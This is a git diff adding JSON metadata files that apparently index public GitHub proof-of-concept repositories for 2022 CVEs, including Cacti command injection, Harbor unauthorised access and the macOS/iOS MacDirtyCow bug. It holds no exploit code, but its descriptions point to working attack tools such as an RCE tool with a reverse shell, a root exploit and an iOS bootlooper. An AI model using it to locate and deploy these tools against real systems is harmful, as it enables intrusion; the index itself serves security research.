"2023-11-09T02:46:53Z", + "pushed_at": "2023-08-30T14:06:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689539220, + "name": "CVE-2022-46169-Exploit", + "full_name": "0xZon\/CVE-2022-46169-Exploit", + "owner": { + "login": "0xZon", + "id": 52760493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52760493?v=4", + "html_url": "https:\/\/github.com\/0xZon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xZon\/CVE-2022-46169-Exploit", + "description": null, + "fork": false, + "created_at": "2023-09-10T06:03:22Z", + "updated_at": "2023-09-10T06:03:53Z", + "pushed_at": "2023-09-10T06:28:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689709304, + "name": "PricklyPwn", + "full_name": "copyleftdev\/PricklyPwn", + "owner": { + "login": "copyleftdev", + "id": 11798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11798?v=4", + "html_url": "https:\/\/github.com\/copyleftdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/copyleftdev\/PricklyPwn", + "description": "An advanced RCE tool tailored for exploiting a vulnerability in Cacti v1.2.22. Crafted with precision, this utility aids security researchers in analyzing and understanding the depth of the CVE-2022-46169 flaw. Use responsibly and ethically.", + "fork": false, + "created_at": "2023-09-10T17:00:50Z", + "updated_at": "2024-04-29T05:12:05Z", + "pushed_at": "2023-09-10T17:14:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "command-injection", + "cve-2022-46169", + "cybersecurity", + "ethical-hacking", + "exploitation-tool", + "payload", + "penetration-testing", + "rce", + "remote-command-execution", + "reverse-shell", + "security", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 722684867, + "name": "CVE-2022-46169", + "full_name": "0xN7y\/CVE-2022-46169", + "owner": { + "login": "0xN7y", + "id": 70061541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70061541?v=4", + "html_url": "https:\/\/github.com\/0xN7y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xN7y\/CVE-2022-46169", + "description": "Exploit for CVE-2022-46169 ", + "fork": false, + "created_at": "2023-11-23T17:36:20Z", + "updated_at": "2023-11-24T04:38:07Z", + "pushed_at": "2023-12-07T08:02:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 778972816, + "name": "CVE-2022-46169", + "full_name": "mind2hex\/CVE-2022-46169", + "owner": { + "login": "mind2hex", + "id": 51345640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4", + "html_url": "https:\/\/github.com\/mind2hex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mind2hex\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2024-03-28T19:23:56Z", + "updated_at": "2024-03-28T19:44:04Z", + "pushed_at": "2024-03-28T19:24:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814041598, + "name": "CVE-2022-46169", + "full_name": "HPT-Intern-Task-Submission\/CVE-2022-46169", + "owner": { + "login": "HPT-Intern-Task-Submission", + "id": 169382051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169382051?v=4", + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2024-06-12T08:24:30Z", + "updated_at": "2024-06-14T03:02:02Z", + "pushed_at": "2024-06-14T03:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 912195951, + "name": "CVE-2022-46169", + "full_name": "lof1sec\/CVE-2022-46169", + "owner": { + "login": "lof1sec", + "id": 105061690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105061690?v=4", + "html_url": "https:\/\/github.com\/lof1sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lof1sec\/CVE-2022-46169", + "description": "Cacti v1.2.22: Unauthenticated Command Injection Vulnerability (CVE-2022-46169)", + "fork": false, + "created_at": "2025-01-04T21:53:47Z", + "updated_at": "2025-01-06T11:49:57Z", + "pushed_at": "2025-01-06T11:49:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46175.json b/2022/CVE-2022-46175.json new file mode 100644 index 0000000000..719dfecff9 --- /dev/null +++ b/2022/CVE-2022-46175.json @@ -0,0 +1,33 @@ +[ + { + "id": 587725691, + "name": "quasar-app-webpack-json5-vulnerability", + "full_name": "giz-berlin\/quasar-app-webpack-json5-vulnerability", + "owner": { + "login": "giz-berlin", + "id": 82261342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82261342?v=4", + "html_url": "https:\/\/github.com\/giz-berlin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giz-berlin\/quasar-app-webpack-json5-vulnerability", + "description": "Reproduction for CVE-2022-46175", + "fork": false, + "created_at": "2023-01-11T12:48:17Z", + "updated_at": "2023-05-08T07:15:54Z", + "pushed_at": "2023-01-11T12:48:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46196.json b/2022/CVE-2022-46196.json new file mode 100644 index 0000000000..5dc62d25be --- /dev/null +++ b/2022/CVE-2022-46196.json @@ -0,0 +1,33 @@ +[ + { + "id": 634625371, + "name": "CVE-2022-46196", + "full_name": "dpgg101\/CVE-2022-46196", + "owner": { + "login": "dpgg101", + "id": 16139822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16139822?v=4", + "html_url": "https:\/\/github.com\/dpgg101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpgg101\/CVE-2022-46196", + "description": null, + "fork": false, + "created_at": "2023-04-30T18:23:41Z", + "updated_at": "2023-09-02T15:53:16Z", + "pushed_at": "2023-04-30T18:31:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46381.json b/2022/CVE-2022-46381.json new file mode 100644 index 0000000000..7ae29f511a --- /dev/null +++ b/2022/CVE-2022-46381.json @@ -0,0 +1,33 @@ +[ + { + "id": 578333493, + "name": "CVE-2022-46381", + "full_name": "amitlttwo\/CVE-2022-46381", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-46381", + "description": null, + "fork": false, + "created_at": "2022-12-14T20:07:52Z", + "updated_at": "2022-12-14T20:07:52Z", + "pushed_at": "2022-12-14T20:07:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46395.json b/2022/CVE-2022-46395.json new file mode 100644 index 0000000000..0fa22549f9 --- /dev/null +++ b/2022/CVE-2022-46395.json @@ -0,0 +1,95 @@ +[ + { + "id": 660325966, + "name": "CVE_2022_46395_Gazelle", + "full_name": "Pro-me3us\/CVE_2022_46395_Gazelle", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_46395_Gazelle", + "description": "CVE-2022-46395 POC for FireTV 3rd gen Cube (gazelle) ", + "fork": false, + "created_at": "2023-06-29T18:54:27Z", + "updated_at": "2024-03-19T15:37:48Z", + "pushed_at": "2023-12-06T15:17:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660326548, + "name": "CVE_2022_46395_Raven", + "full_name": "Pro-me3us\/CVE_2022_46395_Raven", + "owner": { + "login": "Pro-me3us", + "id": 106105250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4", + "html_url": "https:\/\/github.com\/Pro-me3us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_46395_Raven", + "description": "CVE-2022-46395 POC for FireTV 2nd gen Cube (raven) ", + "fork": false, + "created_at": "2023-06-29T18:56:04Z", + "updated_at": "2024-03-19T15:37:19Z", + "pushed_at": "2024-03-19T15:28:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821484239, + "name": "CVE-2022-46395", + "full_name": "SmileTabLabo\/CVE-2022-46395", + "owner": { + "login": "SmileTabLabo", + "id": 112930114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112930114?v=4", + "html_url": "https:\/\/github.com\/SmileTabLabo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SmileTabLabo\/CVE-2022-46395", + "description": null, + "fork": false, + "created_at": "2024-06-28T16:37:46Z", + "updated_at": "2024-11-27T11:16:27Z", + "pushed_at": "2024-06-28T17:07:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46463.json b/2022/CVE-2022-46463.json new file mode 100644 index 0000000000..8b73a009f3 --- /dev/null +++ b/2022/CVE-2022-46463.json @@ -0,0 +1,95 @@ +[ + { + "id": 590053195, + "name": "CVE-2022-46463", + "full_name": "nu0l\/CVE-2022-46463", + "owner": { + "login": "nu0l", + "id": 54735907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54735907?v=4", + "html_url": "https:\/\/github.com\/nu0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nu0l\/CVE-2022-46463", + "description": "CVE-2022-46463(Harbor 未授权)", + "fork": false, + "created_at": "2023-01-17T14:58:14Z", + "updated_at": "2024-12-26T07:35:14Z", + "pushed_at": "2023-01-19T12:47:21Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616913153, + "name": "CVE-2022-46463", + "full_name": "404tk\/CVE-2022-46463", + "owner": { + "login": "404tk", + "id": 54827262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54827262?v=4", + "html_url": "https:\/\/github.com\/404tk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/404tk\/CVE-2022-46463", + "description": "harbor unauthorized detection", + "fork": false, + "created_at": "2023-03-21T10:40:19Z", + "updated_at": "2025-01-03T04:33:54Z", + "pushed_at": "2024-12-12T07:37:01Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 907282734, + "name": "harbor", + "full_name": "CodeSecurityTeam\/harbor", + "owner": { + "login": "CodeSecurityTeam", + "id": 177533437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177533437?v=4", + "html_url": "https:\/\/github.com\/CodeSecurityTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CodeSecurityTeam\/harbor", + "description": "CVE-2022-46463 harbor公开镜像全自动下载脚本", + "fork": false, + "created_at": "2024-12-23T08:35:30Z", + "updated_at": "2024-12-28T07:21:03Z", + "pushed_at": "2024-12-23T08:40:16Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46484.json b/2022/CVE-2022-46484.json new file mode 100644 index 0000000000..33cf7929b8 --- /dev/null +++ b/2022/CVE-2022-46484.json @@ -0,0 +1,33 @@ +[ + { + "id": 570868199, + "name": "CVE-2022-46484", + "full_name": "WodenSec\/CVE-2022-46484", + "owner": { + "login": "WodenSec", + "id": 112494665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112494665?v=4", + "html_url": "https:\/\/github.com\/WodenSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WodenSec\/CVE-2022-46484", + "description": " Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.", + "fork": false, + "created_at": "2022-11-26T11:49:09Z", + "updated_at": "2024-05-12T20:03:15Z", + "pushed_at": "2023-01-11T09:17:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46485.json b/2022/CVE-2022-46485.json new file mode 100644 index 0000000000..d303d8e021 --- /dev/null +++ b/2022/CVE-2022-46485.json @@ -0,0 +1,33 @@ +[ + { + "id": 566891894, + "name": "CVE-2022-46485", + "full_name": "WodenSec\/CVE-2022-46485", + "owner": { + "login": "WodenSec", + "id": 112494665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112494665?v=4", + "html_url": "https:\/\/github.com\/WodenSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WodenSec\/CVE-2022-46485", + "description": "An issue in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to cause a Denial of Service (DoS) via a crafted survey.", + "fork": false, + "created_at": "2022-11-16T16:26:34Z", + "updated_at": "2023-01-11T10:12:05Z", + "pushed_at": "2023-01-13T15:41:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46505.json b/2022/CVE-2022-46505.json new file mode 100644 index 0000000000..72a66694c3 --- /dev/null +++ b/2022/CVE-2022-46505.json @@ -0,0 +1,33 @@ +[ + { + "id": 588404620, + "name": "details-for-CVE-2022-46505", + "full_name": "SmallTown123\/details-for-CVE-2022-46505", + "owner": { + "login": "SmallTown123", + "id": 101922357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101922357?v=4", + "html_url": "https:\/\/github.com\/SmallTown123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SmallTown123\/details-for-CVE-2022-46505", + "description": "MatrixSSL session resume bug", + "fork": false, + "created_at": "2023-01-13T03:07:52Z", + "updated_at": "2023-01-13T03:07:52Z", + "pushed_at": "2023-01-13T03:38:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46604.json b/2022/CVE-2022-46604.json new file mode 100644 index 0000000000..3b7ec6b032 --- /dev/null +++ b/2022/CVE-2022-46604.json @@ -0,0 +1,37 @@ +[ + { + "id": 596935402, + "name": "ResponsiveFileManager-CVE-2022-46604", + "full_name": "galoget\/ResponsiveFileManager-CVE-2022-46604", + "owner": { + "login": "galoget", + "id": 8353133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4", + "html_url": "https:\/\/github.com\/galoget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galoget\/ResponsiveFileManager-CVE-2022-46604", + "description": "Responsive FileManager v.9.9.5 vulnerable to CVE-2022-46604.", + "fork": false, + "created_at": "2023-02-03T08:56:16Z", + "updated_at": "2024-05-20T03:36:32Z", + "pushed_at": "2023-04-09T23:34:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "python3", + "responsivefilemanager" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46622.json b/2022/CVE-2022-46622.json new file mode 100644 index 0000000000..22e5f94bfb --- /dev/null +++ b/2022/CVE-2022-46622.json @@ -0,0 +1,33 @@ +[ + { + "id": 585254254, + "name": "CVE-2022-46622", + "full_name": "sudoninja-noob\/CVE-2022-46622", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-46622", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:52:13Z", + "updated_at": "2023-01-04T17:52:13Z", + "pushed_at": "2023-01-04T17:52:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46623.json b/2022/CVE-2022-46623.json new file mode 100644 index 0000000000..c6d9b6625f --- /dev/null +++ b/2022/CVE-2022-46623.json @@ -0,0 +1,33 @@ +[ + { + "id": 585254938, + "name": "CVE-2022-46623", + "full_name": "sudoninja-noob\/CVE-2022-46623", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-46623", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:54:29Z", + "updated_at": "2023-01-04T17:54:29Z", + "pushed_at": "2023-01-04T17:54:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46689.json b/2022/CVE-2022-46689.json new file mode 100644 index 0000000000..d7588e10cd --- /dev/null +++ b/2022/CVE-2022-46689.json @@ -0,0 +1,455 @@ +[ + { + "id": 579424048, + "name": "MacDirtyCowDemo", + "full_name": "zhuowei\/MacDirtyCowDemo", + "owner": { + "login": "zhuowei", + "id": 704768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/704768?v=4", + "html_url": "https:\/\/github.com\/zhuowei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuowei\/MacDirtyCowDemo", + "description": "Get root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple's XNU source.", + "fork": false, + "created_at": "2022-12-17T16:45:24Z", + "updated_at": "2024-12-07T08:42:14Z", + "pushed_at": "2022-12-21T17:53:19Z", + "stargazers_count": 395, + "watchers_count": 395, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 395, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 581591800, + "name": "McDirty", + "full_name": "ahkecha\/McDirty", + "owner": { + "login": "ahkecha", + "id": 58378453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58378453?v=4", + "html_url": "https:\/\/github.com\/ahkecha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahkecha\/McDirty", + "description": "CVE-2022-46689 POC", + "fork": false, + "created_at": "2022-12-23T16:44:44Z", + "updated_at": "2024-02-16T11:03:17Z", + "pushed_at": "2022-12-23T16:48:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582165833, + "name": "NoCameraSound", + "full_name": "straight-tamago\/NoCameraSound", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/NoCameraSound", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2022-12-26T00:08:55Z", + "updated_at": "2025-01-06T14:09:20Z", + "pushed_at": "2023-10-10T16:53:48Z", + "stargazers_count": 122, + "watchers_count": 122, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 122, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 582233201, + "name": "WDBFontOverwrite", + "full_name": "ginsudev\/WDBFontOverwrite", + "owner": { + "login": "ginsudev", + "id": 25361391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25361391?v=4", + "html_url": "https:\/\/github.com\/ginsudev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ginsudev\/WDBFontOverwrite", + "description": "Proof-of-concept app to overwrite fonts on iOS using CVE-2022-46689.", + "fork": false, + "created_at": "2022-12-26T06:56:35Z", + "updated_at": "2025-01-07T04:01:26Z", + "pushed_at": "2023-08-02T09:35:14Z", + "stargazers_count": 883, + "watchers_count": 883, + "has_discussions": false, + "forks_count": 72, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 72, + "watchers": 883, + "score": 0, + "subscribers_count": 25 + }, + { + "id": 583139600, + "name": "FileManager", + "full_name": "mineek\/FileManager", + "owner": { + "login": "mineek", + "id": 84083936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84083936?v=4", + "html_url": "https:\/\/github.com\/mineek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mineek\/FileManager", + "description": "File Manager for CVE-2022-46689", + "fork": false, + "created_at": "2022-12-28T22:13:35Z", + "updated_at": "2024-11-16T12:43:23Z", + "pushed_at": "2023-01-02T00:36:39Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 82, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 584925426, + "name": "NoHomeBar", + "full_name": "straight-tamago\/NoHomeBar", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/NoHomeBar", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2023-01-03T21:46:37Z", + "updated_at": "2024-12-05T14:27:53Z", + "pushed_at": "2023-01-19T08:04:02Z", + "stargazers_count": 68, + "watchers_count": 68, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 68, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 585014885, + "name": "DockTransparent", + "full_name": "straight-tamago\/DockTransparent", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/DockTransparent", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2023-01-04T05:08:20Z", + "updated_at": "2025-01-05T11:31:01Z", + "pushed_at": "2023-01-19T08:12:40Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 53, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 585711274, + "name": "FileSwitcherX", + "full_name": "straight-tamago\/FileSwitcherX", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/FileSwitcherX", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2023-01-05T21:50:25Z", + "updated_at": "2024-12-31T11:17:24Z", + "pushed_at": "2023-06-13T08:55:50Z", + "stargazers_count": 146, + "watchers_count": 146, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ios" + ], + "visibility": "public", + "forks": 7, + "watchers": 146, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 588186913, + "name": "Mandela-Legacy", + "full_name": "BomberFish\/Mandela-Legacy", + "owner": { + "login": "BomberFish", + "id": 87151697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4", + "html_url": "https:\/\/github.com\/BomberFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BomberFish\/Mandela-Legacy", + "description": "iOS customization app powered by CVE-2022-46689", + "fork": false, + "created_at": "2023-01-12T14:31:30Z", + "updated_at": "2025-01-02T00:29:20Z", + "pushed_at": "2023-02-12T01:37:16Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-46689", + "dirtycow", + "exploit", + "ios", + "macdirtycow", + "swift", + "swiftui", + "tweak" + ], + "visibility": "public", + "forks": 2, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 592538980, + "name": "JailedCement", + "full_name": "BomberFish\/JailedCement", + "owner": { + "login": "BomberFish", + "id": 87151697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4", + "html_url": "https:\/\/github.com\/BomberFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BomberFish\/JailedCement", + "description": "Simple iOS bootlooper using CVE-2022-46689.", + "fork": false, + "created_at": "2023-01-23T23:58:00Z", + "updated_at": "2025-01-02T03:19:23Z", + "pushed_at": "2023-01-24T18:25:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + 